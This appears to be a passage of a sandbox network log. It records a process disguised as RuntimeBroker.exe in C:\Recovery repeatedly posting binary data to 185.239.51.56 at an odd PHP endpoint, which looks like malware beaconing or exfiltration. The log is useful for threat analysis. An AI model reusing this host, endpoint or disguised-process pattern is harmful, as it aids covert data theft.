Jan 1, 2025 02:28:15.628359079 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:15.982616901 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:15.990864992 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 49968 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:16.114981890 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:16.472605944 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:16.817579985 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:16.970289946 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 49975 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:17.234080076 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 49978 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:17.399774075 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:17.753427982 CET | 1600 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:18.101016045 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:18.243886948 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 49980 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:17.521537066 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:17.878329039 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:18.223465919 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:18.238297939 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 49986 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:18.376595020 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2500
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:18.376641035 CET | 2500 | OUT | Data
Jan 1, 2025 02:28:19.099688053 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:19.240170956 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 49993 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:19.362690926 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:19.722126007 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:20.089467049 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:20.101171970 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 49999 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:20.223086119 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:20.581513882 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:20.932914972 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:21.072700977 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50008 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:21.191092968 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:21.550471067 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:21.927916050 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:21.935971022 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50015 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:22.081624031 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:22.440922976 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:22.782949924 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:22.790443897 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50021 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:22.908818960 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:23.253355026 CET | 2504 | OUT | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50023 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:23.259126902 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:23.612715006 CET | 1600 | OUT | Data
Jan 1, 2025 02:28:23.957118034 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:23.964663029 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50025 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:23.378576994 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:23.737704039 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:24.099061966 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:24.107224941 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50032 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:24.244795084 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:24.601005077 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:24.975083113 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:24.982053995 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50037 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:25.112451077 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:25.456471920 CET | 2504 | OUT | Data
Jan 1, 2025 02:28:25.813241005 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:25.820875883 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50042 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:25.946335077 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:26.667474031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:26.804352999 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50049 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:26.924673080 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:27.644191980 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:27.653598070 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 50055 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:27.790401936 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:28.488733053 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:28.497087955 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50063 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:28.629920006 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 50066 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:28.977993965 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:29.681766033 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:29.688855886 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 50068 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:29.096911907 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:29.805066109 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:29.812608957 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 50074 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:29.945794106 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:30.646891117 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:30.655380964 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50081 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:30.790878057 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:31.491914988 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:31.500221968 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 50088 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:31.632669926 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:32.330686092 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:32.340872049 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 50095 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:32.470649958 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:33.180649996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:33.320827007 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 50101 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:33.440710068 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:34.141587019 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:34.149734020 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.4 | 50108 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:34.282628059 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:34.629740000 CET | 2504 | OUT | Data Raw


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 50113 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:34.698033094 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1600
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:35.052246094 CET | 1600 | OUT | Data Raw
Jan 1, 2025 02:28:35.419320107 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:35.425064087 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.4 | 50114 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:34.816765070 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:35.176074028 CET | 2504 | OUT | Data Raw
Jan 1, 2025 02:28:35.545772076 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:35.557522058 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 50120 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:35.677743912 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2500
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:36.034621000 CET | 2500 | OUT | Data Raw
Jan 1, 2025 02:28:36.379292965 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:36.386363983 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 50121 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:36.510262966 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:36.862788916 CET | 2504 | OUT | Data Raw
Jan 1, 2025 02:28:37.215651989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:37.224145889 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.4 | 50122 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:37.350708961 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:37.706521034 CET | 2504 | OUT | Data Raw
Jan 1, 2025 02:28:38.052087069 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:38.059263945 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
